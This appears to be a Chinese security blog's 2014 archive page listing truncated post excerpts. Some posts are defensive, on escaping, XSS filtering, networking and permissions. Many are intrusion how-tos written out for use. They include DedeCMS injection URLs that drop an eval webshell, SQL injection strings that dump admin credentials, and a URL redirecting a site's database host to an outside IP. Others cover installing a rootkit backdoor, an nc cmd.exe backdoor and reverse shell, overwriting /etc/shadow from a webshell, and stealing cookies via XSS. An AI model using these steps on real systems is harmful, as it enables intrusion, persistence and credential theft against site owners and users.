03 2014 档案
php漏洞挖掘书籍
摘要:PHP是一种被广泛使用的脚本语言,尤其适合web开发。具有跨平台,容易学习,功能强大等特点,据统计全世界超过34%的网站有php的应用,包括Yahoo、sina、163、sohu等大型门户网站。而且很多具名的web应用系统(包括bbs,blog,wiki,cms等等)都是使用php开发的,Discu
阅读全文
php漏洞挖掘与代码审计方法
摘要:在甲方公司做代码审计一般还是以白盒为主,漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露等。1.xss + sql注入 其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。写个过滤函数,可由如下所示:$_REQUEST = filter_xss($_REQUEST);$_GET = filter_xss($_GET);$_POST = filter_xss($_POST);$_COOKIE = filter_xss($_COOKIE);$_POST = filter_sql($_
阅读全文
Dedecms getip()的漏洞利用
摘要:flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.phpfunction FushCache($mid=0){if(empty($mid)) $mid = $this->M_ID;$dsql = new DedeSql();$row = $dsql->GetOne("Select ID,userid,pwd,
阅读全文
PHP addslashes() 函数
摘要:定义和用法addslashes() 函数在指定的预定义字符前添加反斜杠。这些预定义字符是:单引号 (')双引号 (")反斜杠 (\)NULL语法addslashes(string)参数描述string必需。规定要检查的字符串。提示和注释提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备合适的字符串。注释:默认情况下,PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导
阅读全文
DEDECMS爆严重安全漏洞
摘要:简要描述:众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”详细说明:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&
阅读全文
DEDECMS之0day入侵总结
摘要:1.查看dedecms最后升级版本:http://xxx.com/data/admin/ver.txt2.利用网上公开之0day进行对应版本之入侵ps:dedecms默认CMS后台:http://xxx.com/dede/
阅读全文
日志文件入侵总结
摘要:1.判断网站是否有log路径2.找到日志文件路径:jwc.xxx.com/log/2014-03-18-log.txt3.找到账户为jwc01的密码password4.登录教务系统
阅读全文
dedecms入侵拿webshell之方法总结
摘要:1、注入漏洞存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>注入成功,产生了注入文件。http://localhost:802/data/mysql_error_trace.php一句话木马连接上传大马即
阅读全文
dedecms会员注册注入漏洞
摘要:一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入三、爆用户:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id四、爆密码的字段:/memb
阅读全文
Dedecms会员中心注入漏洞
摘要:详细说明:member/buy_action.phprequire_once(dirname(__FILE__)."/config.php");CheckRank(0,0);$menutype = 'mydede';$menutype_son = 'op';require_once DEDEINC.'/dedetemplate.class.php';$product = isset($product) ? trim($product) : '';$mid = $cfg_ml->M_ID;$ptype =
阅读全文
PHP之is_a()函数执行代码之总结
摘要:今天看到云舒在群里贴的漏洞公告,原始的文章在http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/后来查了下PHP官方的手册,这个问题是在PHP 5.3.7中更新了is_a()函数的功能。is_a()经常被用于条件判断。 在此前版本的is_a() 的第一个参数如果不是object,则会返回false,现在变成了如果不是object ,则会去执行 __autoload()函数。PHP为此还开了一个bug,但对此bug仍然有争议,部分开发人员认为这个功能是正常的。Aron Budins
阅读全文
二八定律全面分析SEO全过程
摘要:首先,大体的了解SEO的整个流程,SEO的整个流程无非是:关键词选定、标题标签描述的正确描写---内部优化----外链----内容---友情链接---更新。在SEO界流行这样一句话:“内容为王,外链为皇。”所以,SEO的七寸之处在于内容和外链。而关键词选定标题描写和内部优化这两部分则是不太重要的20%部分。利用“二八定律”分析SEO的结果是:内容+外链=80%,内部优化+更新和其他=20%。利用“二八定律”来学习SEO首先是内容.做SEO的人都知道,百度蜘蛛最喜欢的是原创性的东西,而我们正好利用百度蜘蛛这一弱点。外链为王,一直是seoer喜欢挂在嘴边的,这也证明了外链的重要性。列举几种常见的外
阅读全文
SEO之巴莱多定律
摘要:SEO这个词在2007、2008年好像特别的火,尤其在2007年下半年至今,众多SEO爱好者发起了最大的一轮搜索引擎优化研究风暴,甚至最终逼迫百度等大型搜索引擎公司改变算法。 SEO,确实能带来一些经济上的利润。网站做好了,你想要做的自然是推广,可是如何推广呢?如果你是一个有雄厚资金实力的公司,还可以在其他媒体上面考虑一些广告投入,而对个人来说,只能依靠少花钱多办事的方法,因此SEO自然成了很多人推广自己网站的捷径。 这个时候,你在前面所调查得出的一些网民习惯和竞争对手的分析又可以派上用场,你可以在你的网站上做一些确实有市场需要的,而且你的竞争对手并没有去关注的专题做SEO优化,这就是...
阅读全文
OSI七层模型
摘要:OSI(Open System Interconnection),开放式系统互联参考模型 。是一个逻辑上的定义,一个规范,它把网络协议从逻辑上分为了7层。每一层都有相关、相对应的物理设备,比如常规的路由器是三层交换设备,常规的交换机是二层交换设备。OSI七层模型是一种框架性的设计方法 ,建立七层模型的主要目的是为解决异种网络互连时所遇到的兼容性问题,其最主要的功能就是帮助不同类型的主机实现数据传输。它的最大优点是将服务、接口和协议这三个概念明确地区分开来,通过七个层次化的结构模型使不同的系统不同的网络之间实现可靠的通讯。模型优点建立七层模型的主要目的是为解决异种网络互连时所遇到的兼容性问题。[
阅读全文
TCP/IP协议
摘要:Transmission Control Protocol/Internet Protocol的简写,中译名为传输控制协议/因特网互联协议,又名网络通讯协议,是Internet最基本的协议、Internet国际互联网络的基础,由网络层的IP协议和传输层的TCP协议组成。TCP/IP 定义了电子设备如何连入因特网,以及数据如何在它们之间传输的标准。协议采用了4层的层级结构,每一层都呼叫它的下一层所提供的协议来完成自己的需求。通俗而言:TCP负责发现传输的问题,一有问题就发出信号,要求重新传输,直到所有数据安全正确地传输到目的地。而IP是给因特网的每一台电脑规定一个地址。基本概念IPIP层接收由更
阅读全文
1433端口之思考
摘要:1433端口,是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。1隐蔽很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了。可惜,通过微软未公开的1434端口的UDP探测可以很容易的知道SQL Server使用了什么TCP/IP端口。不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦。在实例属性中选择TCP/IP协议的属性。选择隐藏 SQL S
阅读全文
阿里巴巴安全面试
摘要:第一部分:名词解释1.什么叫webshell2.什么叫人肉搜索3.什么叫溢出4.什么是cc攻击5.什么叫网络钓鱼第二部分:问答题1.你平时获取网路安全技术的渠道有哪些?2.产生安全漏洞的原因是什么?3.请说明linux系统中的权限描述"-rwst-xr-x"的含义。第三部分:代码题1.下面代码有什么安全问题,请指出修正。String downFile = request.getParameter("pdf_file");FileInputStream file = new FileInputStream("/upload/pdf/"+
阅读全文
SqlMap之数据库操作语句总结
摘要:SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。#> ./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库#>...
阅读全文
WINXP上安装及使用SqlMap之方法
摘要:1、首先下载SqlMap点击下载。2、其次下载用于Windows系统的Python ……点击这里……3、然后安装Python:Python默认安装的路径是“C:\Python”(你也可以修改安装路径,但要记住路径),直接默认安装“下一步”OK … :)4、解压SqlMap.zip里面的文件…5、找到你安装python的目录(对于我来说:C:\Python27中)6、现在,在python文件夹中创建一个新的文件夹,并命名为“SqlMap”7、然后把你刚才解压的SqlMap中的文件全部复制到C:\Python27\sqlmap文件夹里面8、最后在桌面空白处右键创建一个新的快捷方式:并命名为“Sql
阅读全文
sqlmap原理及使用方法
摘要:1 。 介绍1.1 要求1.2 网应用情节1.3 SQL 射入技术1.4 特点1.5 下载和更新sqlmap1.6 执照2 。 用法2.1 帮助2.2 目标URL2.3 目标URL 和verbosity2.4 URL 参量2.5 Google dork2.6 HTTP 方法: 得到或张贴2.7 张贴的数据串2.8 HTTP 曲奇饼倒栽跳水2.9 HTTP 用户代理倒栽跳水2.10 任意HTTP 用户代理倒栽跳水2.11 HTTP 认证2.12 HTTP 代理人2.13 串比赛2.14 遥远的数据库管理系统2.15 广泛的DBMS 指印2.16 横幅2.17 当前的用户2.18 当前的数据库2.
阅读全文
nmap原理及使用方法
摘要:NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包。1简介nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统保安。正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小孩)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus混为一谈。Nma
阅读全文
一句话木马的原理及利用
摘要:一句话木马的原理及利用(asp,aspx,php,jsp)一句话木马的适用环境:1.服务器的来宾账户有写入权限2.已知数据库地址且数据库格式为asa或asp3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可一句话木马的工作原理:"一句话木马"服务端(本地的html提交文件)就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改"一句话木马"客户端(远程服务器上被插入一句话的as
阅读全文
struts2漏洞原理及解决办法
摘要:Struts2被曝存在重大远程任意代码执行安全漏洞,影响Struts2全系版本。而对于此次堪比棱镜事件的危害,安全宝指出,众多大型互联网厂商均存在该漏洞,且影响厂商仍在扩大之中。同时漏洞利用代码已经被强化,可直接通过浏览器的提交对服务器进行任意操作并获取敏感内容。目前安全宝用户暂可高枕无忧。同时也建...
阅读全文
struts2安全漏洞
摘要:1 背景Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。2内容在2013年6月底发布的Struts 2.3.15版本被曝出存在重要的安全漏洞[1],主要问题如下:可远程执行服务器脚本代码[2]用户可以构造http://host/struts...
阅读全文
WordPress < 3.6.1 PHP 对象注入漏洞
摘要:0x00 背景当我读到一篇关于Joomla的“PHP对象注射”的漏洞blog后,我挖深了一点就发现Stefan Esser大神在2010年黑帽大会的文章:http://media.blackhat.com/bh-us-10/presentations/Esser/BlackHat-USA-2010-Esser-Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits-slides.pdf这篇文章提到了PHP中的unserialize函数当操作用户生成的数据的时候会产生安全漏洞。所以呢,基本来说
阅读全文
VLAN讲解
摘要:VLAN(Virtual Local Area Network)的中文名为"虚拟局域网"。VLAN是一种将局域网设备从逻辑上划分成一个个网段,从而实现虚拟工作组的新兴数据交换技术。这一新兴技术主要应用于交换机和路由器中,但主流应用还是在交换机之中。但又不是所有交换机都具有此功能,只有VLAN协议的第二层以上交换机才具有此功能,这一点可以查看相应交换机的说明书即可得知。VLANIEEE于1999年颁布了用于标准化VLAN实现方案的802.1Q协议标准草案。VLAN技术的出现,使得管理员根据实际应用需求,把同一物理局域网内的不同用户逻辑地划分成不同的广播域,每一个VLAN都包含
阅读全文
cc攻击技术
摘要:攻击者借助代理服务器生成指向受害主机的合法请求,实现DOS,和伪装就叫:cc(ChallengeCollapsar)。CC主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观。一个静态页面不需要服务器多少资源,甚至可以说直接从内存中读出来发给你就可以了,但是论坛就不一样了,我看一个帖子,系统需要到数据库中判断我是否有读读帖子的权限,如果有,就读出帖子里面的内容,显示出来——这里至少访问了2次数据库,如果数据库的体积有200MB大小,系统很
阅读全文
伪造发件人之邮件地址之实现
摘要:写了一个利用Jmail组件发匿名邮件的ASP代码,前提是你的SMTP服务器没有验证发件人地址才是,很多虚拟主机的SMTP服务器就可以的。代码如下:JMailSpoof v0.1JMailSpoof by lake2
阅读全文
LINUX之文件操作权限讲解
摘要:r(Read,读取):对文件而言,具有读取文件内容的权限;对目录来说,具有浏览目 录的权限。 w(Write,写入):对文件而言,具有新增、修改文件内容的权限;对目录来说,具有删除、移动目录内文件的权限。x(eXecute,执行):对文件而言,具有执行文件的权限;对目录了来说该用户具有进入目录的权限。s或S(SUID,Set UID):可执行的文件搭配这个权限,便能得到特权,任意存取该文件的所有者能使用的全部系统资源。请注意具备SUID权限的文件,黑客经常利用这种权限,以SUID配上root帐号拥有者,无声无息地在系统中开扇后门,供日后进出使用。T或T(Sticky):/tmp和 /var/t
阅读全文
phpMyAdmin配置
摘要:一: (1):下载phpmyadmin,在官方最好 (2):个人建议最好将其安装在apache的htdocs文件中(apache的默认虚拟目录,或web访问目录) (3):在phpmyadmin文件夹中找libraries文件夹中的config.default.php文件进行配置: $cfg['PmaAbsoluteUri'] = 'http://localhost/phpmyadmin/'; $cfg['DefaultLang'] = 'zh';(zh代表简体中文)$cfg['Servers'][$i]['
阅读全文
基于CSRF的XSS攻击
摘要:有些XSS不好利用啊,比如有些后台的XSS漏洞,你进不了别人的后台,怎么能 利用他的XSS漏洞呢?进得了别人的后台,还利用这个XSS漏洞干什么?其实这个时候可以种个后门(如果那是个持久型的XSS,这是后话)。有些被称为鸡 肋的XSS漏洞其实很多时候是因为没有找到合适的利用方式而已。比如百度空间的自定义模板处,那里还有两处持久型的XSS漏洞,一个是在编辑CSS的textarea中写入这样的代 码' name='spCssText'/>"s = s+""s = s+""s = s+""s = s+&
阅读全文
PHP防SQL注入攻击
摘要:一般性的防注入,只要使用php的 addslashes 函数就可以了。PHP代码$_POST=sql_injection($_POST);$_GET=sql_injection($_GET);functionsql_injection($content){if(!get_magic_quotes_gpc()){if(is_array($content)){foreach($contentas$key=>$value){$content[$key]=addslashes($value);}}else{addslashes($content);}}return$content;}做系统的话,
阅读全文
过滤xss攻击和sql注入函数
摘要:/**+----------------------------------------------------------* The goal of this function is to be a generic function that can be used to parse almost any input and * render it XSS safe. For more information on actual XSS attacks, check out http://ha.ckers.org/xss.html. * Another excellent site is t
阅读全文
XSS攻击过滤函数
摘要:黑客用XSS攻击有多种方式,PHP的内置函数不能应对各种各样的XSS攻击。因此,使用filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags等功能也不能做到100%的防护。你需要一个更好的机制,这是你的解决方案:]+?[\x00-\x20"\'])(?:on|xmlns)[^>]*+>#iu', '$1>', $data);// Remove javascript: and vbscript: protocols$data = preg_r
阅读全文
xss的高级利用
摘要:以往对XSS的利用大多数都是针对于挂马,钓鱼,盗cookie等,这些方式并没有真正发挥到XSS的作用,因为很少人能了解XSS的实质,会话劫持,浏览器劫持,XSS能做到的东西远远超乎我们的想象。一 XSS下提升权限 随着AJAX技术在许多大型SNS网站的应用,XSS也变得愈加流行,在XSS场景下运用AJAX能更有效地发挥它的作用。用户输入的地方最容易滋生XSS,譬如留言、评论等表单,我搭建了一个sdbook的留言本,因为sdbook没有对用户输入的变量作出合适的过滤,导致一个XSS的产生。 留言率先传递给管理员,当作javascript劫持,我们就可以利用管理员的权限做任何事情,例如添加一个管理
阅读全文
[80Sec]深掘XSS漏洞场景之XSS Rootkit
摘要:顶80SEC的牛。深掘XSS漏洞场景之XSS Rootkit[完整修订版]EMail: rayh4c#80sec.comSite: http://www.80sec.comDate: 2011-10-150×00 前言众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久型和非持久型两种:1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客使用的XSS内容经正常功能进入数据库持久保存。3. DOM XSS漏洞
阅读全文
XSS之浪潮已经来临
摘要:前些天和Roy厉在微博上聊到微信公众账号,我说我在辛苦运营“网站安全中心”这个账号呢,他说我这账号粉丝少是少了点,不过用户定位精确,我说我不希望精确,因为我在尽可能写科普,科普需要传播。Roy厉说过两天他会在他的“戏里戏外”这个微信公众账号里帮我推推,这不,昨天推了下,就涨了很多粉。这里特别感谢他下,也推荐大家收听这位有情怀的黑客的“戏里戏外”。今天的话题也是顺着他的推荐而起的,他说到我玩XSS数一数二,奠定了之后的一些玩法。对他的说法,不敢当。书其实我是后起之秀,07年底才开始从PC安全专过来研究前端安全,不知道为什么我感觉前端安全会是一次浪潮。XSS的很多玩法,我都写进我们的书里《Web前
阅读全文
LINUX下渗透提权之嗅探技术
摘要:内网渗透在攻击层面,其实更趋向于社工和常规漏洞检测的结合,为了了解网内防护措施的设置是通过一步步的刺探和经验积累,有时判断出错,也能进入误 区。但是如果能在网内进行嗅探,则能事半功倍,处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破,到控制整个内网的全过程来跟大家讨论,内 网的渗透嗅探术和安全防护一些内容。在寻找突破时,更多的是从应用服务来,而应用服务最直观的信息采集,就是端口扫描,不同的应用,开放的服务不一样。所以,在对网络进行信息收集时, 大概分为这样两步: 端口探测,程序指纹分析。在端口探测方面,个人喜欢用SuperScan来快速对网段里的应用进行判断,如图:在掌握端口信息后
阅读全文
php上传漏洞获root权限
摘要:首先用nmap检测一下目标网站的系统服务和一些端口banner的信息。Nmap -v -sT -sV -O -P0 -oX test.xml ***.kr21/tcp open ftp ProFTPD22/tcp open ssh OpenSSH 4.3 (protocol 2.0)25/tcp open smtp Sendmail 8.13.8/8.13.853/tcp open domain ISC BIND 9.3.4-P180/tcp open http Apache httpd135/tcp filtere...
阅读全文
LINUX提权笔记
摘要:没啥技术含量,一种思路,让某些得到root权限webshell的童鞋可以快点拿到权限。某日拿到某站webshell,RedHat 系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。1.webshell直接替换root密码: /etc/shadow // 记得备份2.允许root通过ssh登陆: /etc/ssh/sshd_configPermitRootLogin yes #允许root登陆3.重启ssh服务 service ssh restart4.以root身份登陆ssh,增加一个用户useradd applicationpasswd // 根据提示设置密
阅读全文
rootkit后门之安装流程
摘要:1.首先是获得远程服务器的root权限2.然后下载rootkit程序,本文用到的是mafix(下载前最好把杀毒软件关掉,基本上会报毒的!)3.开始安装tar -xvzf mafix.tar.gzcd mafix./root rootkit345 (其中rootkit为你连接后门程序时的密码,345为连接的端口)可以验证一下是否成功:[root@localhost ~]# netstat -anlp|grep 345tcp 0 0 0.0.0.0:345 0.0.0.0:* LISTEN 11280/ttyload可以看到,345端口已经在监听了。4.连接后门程序ssh 192.168.211.
阅读全文
LINUX提权后获取敏感信息之方法
摘要:文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。列举关键点(Linux)的提权是怎么一回事:收集–枚举,枚举和一些更多的枚举。过程–通过数据排序,分析和确定优先次序。搜索–知道搜索什么和在哪里可以找到漏洞代码。适应–自定义的漏洞,所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。尝试–做好准备,试验和错误。操作类型操作类型是什么版本?cat/etc/issuecat/etc/*-releasecat/etc/lsb-releasecat/etc/redhat-release它的内核版本是什么?cat/proc/version
阅读全文
LINUX之内网渗透提权
摘要:在渗透测试过程中,经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控制,无法通过互联网直接访问本地开放的服务,Windows方 面,国内通常选择Lcx.exe来进行端口转发,在应用方面大多数人也会选择reDuh来进行端口转发,而linux却很少人用系统自带的ssh、iptables自身来处理此类问题。由于时间有限,本文只详细的介绍ssh tunnel方面的知识,iptables的有空再加上。SSH的三个端口转发命令:ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Hostssh -C -f -N -g -R
阅读全文
LINUX下使用NC反弹CMDSHELL提权
摘要:很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统!找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666然后再点你shell连接成功就出现下面的内容然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通过Webshell把EXP上传到/tmp目录下,为什么要传到这个目录呢?因为在Linux下一般tmp目录的权限
阅读全文
多站点IIS用户安全权限设置
摘要:如果我们为每个站点都建立一个用户,并设置该用户只有访问本站点的权限,那么就能将访问权限控制在每个站点文件夹内,旁注问题也就解决了一、这样配置的好处?不知大家有没有听过旁注?我简单的解释一下吧:有个人想黑掉A站点,但找来找去都没发现可利用的漏洞,无意中他发现与A同服务器上还有个B站点,并且在B站点上找到了可利用的漏洞,于是他将木马从B站中上传至服务器,如果服务器权限配置不当,那么现在他就可以黑掉服务器上的所有站点了!如果我们为每个站点都建立一个用户,并设置该用户只有访问本站点的权限,那么就能将访问权限控制在每个站点文件夹内,旁注问题也就解决了。二、准备工作1、运行环境:Win2K 服务器版 +
阅读全文
web.config及<customErrors>节点之说明
摘要:Web.config文件是一个XML文本文件,它用来储存ASP.NETWeb应用程序的配置信息(如最常用的设置ASP.NETWeb 应用程序的身份验证方式),它可以出现在应用程序的每一个目录中。当你通过.NET新建一个Web应用程序后,默认情况下会在根目录自动创建一个默认的Web.config文件,包括默认的配置设置,所有的子目录都继承它的配置设置。如果你想修改子目录的配置设置,你可以在该子目录下新建一个Web.config文件。它可以提供除从父目录继承的配置信息以外的配置信息,也可以重写或修改父目录中定义的设置。在运行时对Web.config文件的修改不需要重启服务就可以生效(注: 节例外)
阅读全文
windows服务器提权前请先执行systeminfo命令
摘要:pr、巴西烤肉 对应补丁好多朋友见到Windows服务器就祭出pr、巴西烤肉一气搞,忙完免杀又忙找可写目录,最后发现服务器打上了对应的补丁。笔者在提权前都会执行systeminfo命令,查看对应补丁有没打上。PR对应补丁号: KB952004巴西烤肉对应补丁号:KB956572
阅读全文
通过nc构造telnet后门
摘要:nc被称为网络中的“瑞士军刀”,其功能强大,如果在肉鸡上运行“nc.exe –p port –L –d –e cmd.exe”命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个 telnet后门,当系统重新启动后,该后门会继续存在。当然nc还有许多其它用法: (1)连接到REMOTE主机,格式:nc -nvv 192.168.x.x 80 ,表示连到192.168.x.x的TCP80端口 (2)监听LOCAL主机,格式:nc -l -p 80 ,表示监听本机的TCP80端口 (3)扫描远程主机,格式:nc -n...
阅读全文
Cookie && Session之验证实例
摘要:为了防止各种自动登录,以及反作弊和破坏,往往会要求登录时让用户输入随机产生的验证码(这组验证码是一组数字和字母),这样可以起到一定的防止他人利用程序让机器自动反复登录的情况。在PHP下要实现这种功能是非常的简单。注意:产生图片要求修改php.inn文件,当然要extension_dir要指向扩展的库文件夹,extension=php_gd2.dll前面的分号要去掉,开启图片生成功能。用Cookie实现验证代码如下,具体可以看注释,用cookie非常方便,只是有点不太安全---------------------------------------------文件cookieValidate.p
阅读全文
session劫持技术
摘要:目录:0×00 应用程序认证设计背景0×01 常规攻击思路及缺陷0×02 利用应用程序设计缺陷进行Session劫持的攻击原理0×03 Session劫持的大致思路及意义0×04 如何防御这种攻击0×00 应用程序认证设计背景一个应用程序在设计的过程中,为了实现对资源和请求进行管理,用户信息认证是非常重要的一环。由于HTTP请求的无连接性,一般的应用程序都是通过Cookie或者Session来完成认证工作,通过将加密的用户认证信息存储到Cookie中,或者通过赋予客户端的一个Token,通常也就是所说的SessionId来在服务器端直
阅读全文
基于cookie或session的登陆验证之安全性问题
摘要:因为session是关了浏览器就没了。所以可以通过cookie结合session方法来做验证!第一次登陆,生成一个cookie,保存一些加密的帐号信息,然后再生成一个session这样去其他需要验证的页面只要验证这个新生成的session是否存在了,不需要再去数据库查询。如果关了浏览器再开,去需要验证的页面,因为用来验证的session没了,就通过cookie的数据去数据库查询了对比,如果对比正确,就生成一个和上面那样的session,并且页面可以访问。再去其他的验证页面,以为session在刚才访问的时候生成了,就能用来验证,就不需要通过cookie了。PHP之cookie &&am
阅读全文
盗COOKIE之方法总结
摘要:1.xss跨站盗cookie2.ajax跨域盗cookie3.hosts文件映射对于第一种方法,首先:在有跨站漏洞的页面贴上跨站代码如://意思是接收客户端用户的cookie并发送到delcookie.asp这个页面进行处理,处理的结果是通过delcookie.asp这个页面将客户端的cookie写入一个叫cookie.txt的文件中,从而实现目的!然后,在webshell与delcookie.asp同目录之下建立一个cookie.txt文件接收cookie!最后,通过cookie欺骗登入网站后台!进而对网站提权,呵呵~delcookie.asp代码:xx对于第二种方法,利用ajax盗取coo
阅读全文
会话追踪(session tracking)
摘要:HTTP是一种无连接的协议,如果一个客户端只是单纯地请求一个文件(HTML或GIF),服务器端可以响应给客户端,并不需要知道一连串的请求是否来自于相同的客户端,而且也不需要担心客户端是否处在连接状态。但是这样的通信协议使得服务器端难以判断所连接的客户端是否是同一个人。当进行Web程序开发时,我们必须想办法将相关的请求结合一起,并且努力维持用户的状态在服务器上,这就引出了会话追踪(session tracking)。1:会话与会话追踪session中文经常翻译为“会话”,其本来的含义是指有始有终的一系列动作或消息,比如打电话时从拿起电话拨号到挂断电话这中间的一系列过程可以称之为一个session
阅读全文
XSS盗COOKIE
摘要:XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的phishing攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScr
阅读全文
ActiveX 控件漏洞挖掘之方法
摘要:ActiveX是微软公司提出,并在1996年被正式命名的组件技术。该技术提供了一种通用的开放程序接口,使用这种技术开发的ActiveX控件可以直接集成到IE浏览器或第三方应用程序中,但由于第三方编程等问题,控件的漏洞越来越多,很容易被攻击者利用进行破坏及窃取信息等活动,给个人和企业带来很大损失。本文结合H3C攻防研究团队在攻防研究过程中的经验和体会,阐述ActiveX控件漏洞产生的原理及漏洞挖掘方法。ActiveX 控件概念1. ActiveX产生ActiveX是以微软COM模型(Component Object Model)为理论基础建立起来的技术,通过建立带有接口的对象,ActiveX控件
阅读全文
Windows之权限讲解
摘要:windows中,权限指的是不同账户对文件,文件夹,注册表等的访问能力。在windows中,为不同的账户设置权限很重要,可以防止重要文件被其他人所修改,使系统崩溃。1权限概念我们可以在控制面板中设置账户时设置权限作为微软第一个稳定且安全的操作系统,WindowsXP经过几年的磨合过渡期,终于以超过Windows系列操作系统50%的用户占有量成为目前用户使用最多的操作系统。在慢慢熟悉了Windows XP后,人们逐渐开始不满足基本的系统应用了,他们更加渴望学习一些较深入且实用的知识,以便能让系统充分发挥出Windows XP的高级性能。因此本文以Windows XP Professional版本
阅读全文
Windows之权限的继承性 累加性 优先性 交叉性及四项基本原则
摘要:Windows NT以后的文件,及文件夹共享设置有以下特性:继承性、累加性、优先性、交叉性。 继承性是说下级的目录在没有经过重新设置之前,是拥有上一级目录权限设置的。这里还有一种情况要说明一下,在分区内复制目录或文件的时候,复制过去的目录和文件将拥有它现在所处位置的上一级目录权限设置。但在分区内移动目录或文件的时候,移动过去的目录和文件将拥有它原先的权限设置。 累加性是说如一个组GROUP1中有两个用户USER1、USER2,他们同时对某文件或目录的访问权限分别为“读取”和“写入”,那么组GROUP1对该文件或目录的访问权限就为USER1和USER2的访问权限之和,实际上是取其最大的那个,即“
阅读全文
留言本的漏洞挖掘总结
摘要:留言本的功能比较单一,一般针对普通浏览者只有留言的功能。而对于管理员的功能多少在于编写着对留言本的优化。一般管理员有回复留言编辑留言删除留言还有网站用户修改网站基础(类似与标题等)修改。常见漏洞①Conn.asp暴库漏洞测试程序:粑粑工作室留言本2.0漏洞代码:其实这个也不算上漏洞代码,针对这个漏洞的原因大家可以看看vip脚本入侵教程的[第5课]暴库的原理和实践直接访问就把路径爆出来了。'C:\Inetpub\111\留言本2.0\include\data\#baba@yaoyao520.mdb'看到这段了吧。正常的数据库文件在C:\Inetpub\111\留言本2.0\dat
阅读全文
漏洞挖掘分析技术总结
